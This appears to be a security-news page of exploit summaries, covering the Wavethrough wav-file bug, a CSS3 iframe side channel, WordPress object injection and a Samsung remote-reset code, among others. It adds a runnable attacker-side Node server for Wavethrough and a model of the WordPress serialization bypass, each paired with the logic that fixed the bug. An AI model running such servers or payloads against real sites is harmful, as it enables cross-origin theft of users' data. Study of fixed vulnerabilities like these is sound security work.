Wavethrough – Stealing data from remote sites through (fake) wav files

Jake Archibald discovered a really nice browser bug (since fixed) that let him steal data from remote sites by loading it as a (fake) wav file. The exploit works as follows: Make a request to evil-script, using a Content-Range header to suggest there’s more data to be loaded …
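As an added example (not Jake Archibald's code, and not from the post the excerpt links to), here is the attacker-side half of that sequence written as pure functions so it can be exercised without a network: the first reply carries only a minimal wav header with a Content-Range whose total promises far more, and the browser's follow-up Range request is answered with a redirect so that the "rest of the audio" is fetched from another origin. The victim URL, the function names and the claimed total are placeholders; the final function is a simplified statement of the check that closes the hole (a ranged continuation must end up at the same origin as the response it continues), not a transcription of any one engine.

```javascript
// Added example, not Jake Archibald's code: the attacker-side response
// sequence of a Wavethrough-style server, modelled as pure functions so it
// runs without a network. The victim URL is a placeholder.

// Minimal 44-byte RIFF/WAVE header for `dataBytes` bytes of 16-bit mono PCM.
// The browser needs only this much to start treating the resource as audio.
function wavHeader(dataBytes, sampleRate = 44100) {
  const buf = Buffer.alloc(44);
  buf.write('RIFF', 0, 'ascii');
  buf.writeUInt32LE(36 + dataBytes, 4);   // RIFF chunk size
  buf.write('WAVE', 8, 'ascii');
  buf.write('fmt ', 12, 'ascii');
  buf.writeUInt32LE(16, 16);              // fmt chunk size
  buf.writeUInt16LE(1, 20);               // audio format: PCM
  buf.writeUInt16LE(1, 22);               // channels: mono
  buf.writeUInt32LE(sampleRate, 24);
  buf.writeUInt32LE(sampleRate * 2, 28);  // byte rate = rate * block align
  buf.writeUInt16LE(2, 32);               // block align
  buf.writeUInt16LE(16, 34);              // bits per sample
  buf.write('data', 36, 'ascii');
  buf.writeUInt32LE(dataBytes, 40);
  return buf;
}

// Plan the reply to one request for "evil-script".
// No Range header (first fetch): a 206 carrying only the header, whose
// Content-Range claims `claimedTotal` bytes in total so the browser comes
// back for the rest.
// Range header (follow-up): a redirect, so the remaining bytes are fetched
// from a different origin and, in the vulnerable browsers, glued onto the
// same media resource.
function planResponse(requestHeaders, victimUrl, claimedTotal = 1 << 20) {
  if (!('range' in requestHeaders)) {
    const header = wavHeader(claimedTotal - 44);
    return {
      status: 206,
      headers: {
        'Content-Type': 'audio/wav',
        'Accept-Ranges': 'bytes',
        'Content-Range': `bytes 0-${header.length - 1}/${claimedTotal}`,
        'Content-Length': String(header.length),
      },
      body: header,
    };
  }
  return { status: 302, headers: { Location: victimUrl }, body: Buffer.alloc(0) };
}

// Client-side rule that closes the hole, simplified: a ranged follow-up must
// end up at the same origin as the response it continues.
function rangeContinuationAllowed(firstResponseUrl, followupFinalUrl) {
  return new URL(firstResponseUrl).origin === new URL(followupFinalUrl).origin;
}

// Wiring for a real listener (not started here): node -e "require('./x').serve(8080, url)"
function serve(port, victimUrl) {
  return require('http').createServer((req, res) => {
    const plan = planResponse(req.headers, victimUrl);
    res.writeHead(plan.status, plan.headers);
    res.end(plan.body);
  }).listen(port);
}
```

Node lowercases incoming header names, which is why `planResponse` looks for `range` rather than `Range`; a fixed browser applies the origin comparison to the final URL of the redirected follow-up, which is exactly the pair `rangeContinuationAllowed` takes.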

Side-channel attacking browsers through CSS3 features

Ruslan Habalov and Dario Weißer found a way to read contents from an iframe, using CSS3: Accessing the DOM of an iframe that includes a cross-origin resource is forbidden by default. However, the content of the iframe was displayed in the same context as the rest of the site so we wanted to verify if …

Stealing your browser history with the W3C Ambient Light Sensor API

A few years ago window.getComputedStyle and the like were adjusted to return the default color of links, instead of the actual color on screen. Security and privacy were the driving factors behind that decision: by styling :visited links with a different color than their non-visited counterparts, a hacker could easily determine which sites a user …

WordPress < 3.6.1 PHP Object Injection

WordPress 3.6.1 fixes a PHP object injection vulnerability, detected by one of my former students. He also wrote an extensive writeup about it. Let’s recap: maybe_serialize(‘i:1;<funkycharacterhere>’) is inserted into the database. As WordPress does not see this as a serialized string (because it doesn’t end in ; or }), this will result in i:1;. …
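To make the gap in that recap concrete, here is an added example (JavaScript written for this page, not WordPress code or the student's writeup) that models the shape of WordPress's is_serialized() and maybe_serialize() and runs a value through a simulated store-and-read cycle. The "funky character" is left as a placeholder (the example uses an emoji) and the storage step is an assumption stated in the code: the column silently drops the input from the first character it cannot represent. The `strict` flag models the pre-fix check (the value must end in ; or }) against the relaxed check in which a value that merely contains a serialization terminator is serialized before storage.

```javascript
// Added example, not WordPress code: a model of is_serialized() and
// maybe_serialize() showing why a trailing character that the storage layer
// drops turns a "plain string" into serialized data. The trailing character
// and the drop rule are placeholders/assumptions, not the writeup's specifics.

// Model of is_serialized(). `strict` is the pre-3.6.1 behaviour: the value
// must END in ';' or '}' to count as serialized. Non-strict only requires a
// ';' or '}' somewhere past the type prefix.
function isSerialized(data, strict = true) {
  if (typeof data !== 'string') return false;
  data = data.trim();
  if (data === 'N;') return true;
  if (data.length < 4 || data[1] !== ':') return false;
  if (strict) {
    const last = data[data.length - 1];
    if (last !== ';' && last !== '}') return false;
  } else {
    const semi = data.indexOf(';');
    const brace = data.indexOf('}');
    if (semi === -1 && brace === -1) return false;
    if (semi !== -1 && semi < 3) return false;
    if (brace !== -1 && brace < 4) return false;
  }
  const token = data[0];
  switch (token) {
    case 's':
      if (strict) { if (data[data.length - 2] !== '"') return false; }
      else if (!data.includes('"')) return false;
      // fall through: 's' shares the "token:length:" shape with 'a' and 'O'
    case 'a':
    case 'O':
      return new RegExp(`^${token}:[0-9]+:`).test(data);
    case 'b':
    case 'i':
    case 'd':
      return new RegExp(`^${token}:[0-9.E-]+;${strict ? '$' : ''}`).test(data);
    default:
      return false;
  }
}

// Model of maybe_serialize() for strings: values that do not look serialized
// are stored verbatim; values that do are wrapped as a serialized string so
// they round-trip as a string instead of being unserialized on read.
function maybeSerialize(value, strict = true) {
  if (typeof value !== 'string') throw new TypeError('example handles strings only');
  return isSerialized(value, strict)
    ? `s:${Buffer.byteLength(value, 'utf8')}:"${value}";`
    : value;
}

// Assumption (not from the excerpt): the column drops the input from the
// first character it cannot represent. `accepts` is a constructed rule that
// keeps only characters in the Basic Multilingual Plane.
function storeInColumn(value, accepts = ch => ch.codePointAt(0) <= 0xffff) {
  let out = '';
  for (const ch of value) {          // iterates by code point
    if (!accepts(ch)) break;
    out += ch;
  }
  return out;
}

// Read side, modelled for 'i' and 'O' only: whatever looks serialized now is
// unserialized. In PHP an 'O:' payload would instantiate a class here, which
// is the object injection.
function maybeUnserialize(stored) {
  if (!isSerialized(stored)) return stored;
  if (stored[0] === 'i') return { type: 'int', value: Number(stored.slice(2, -1)) };
  if (stored[0] === 'O') return { type: 'object', raw: stored };
  return { type: 'other', raw: stored };
}

// Walk one value through write, storage and read.
function roundTrip(input, strict = true) {
  const onWire = maybeSerialize(input, strict);
  const stored = storeInColumn(onWire);
  return { onWire, stored, read: maybeUnserialize(stored) };
}
```

With the strict check, `'i:1;' + '\u{1F600}'` is stored verbatim, the storage step leaves `i:1;`, and the read side hands back an integer the application never wrote; an `O:` prefix in the same position is what makes it object injection. With the relaxed check the same input is wrapped first, the truncated `s:8:"i:1;` no longer passes the check, and the reader gets an opaque string back. The lesson is the general one: a validity check performed before storage is worthless if storage can transform the value afterwards.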

Major Samsung Galaxy TouchWiz exploit hard resets a device by just visiting a website

A phone dialer code can hard reset a Galaxy S2, S3, and a number of lesser-known devices that use Samsung’s TouchWiz overlay. The idea is that an operator could enter it on the keypad manually to hard reset all of the data. However, it was discovered last month that an SMS could carry the number …

iOS in-app proxy

We received some disturbing tips today that a Russian developer has published a method of obtaining in-app purchases from iOS apps for free. The “in-app proxy” method does not require a jailbreak, can be completed by novices in three steps using just an iOS device, and allows users to install in-app content for free. The …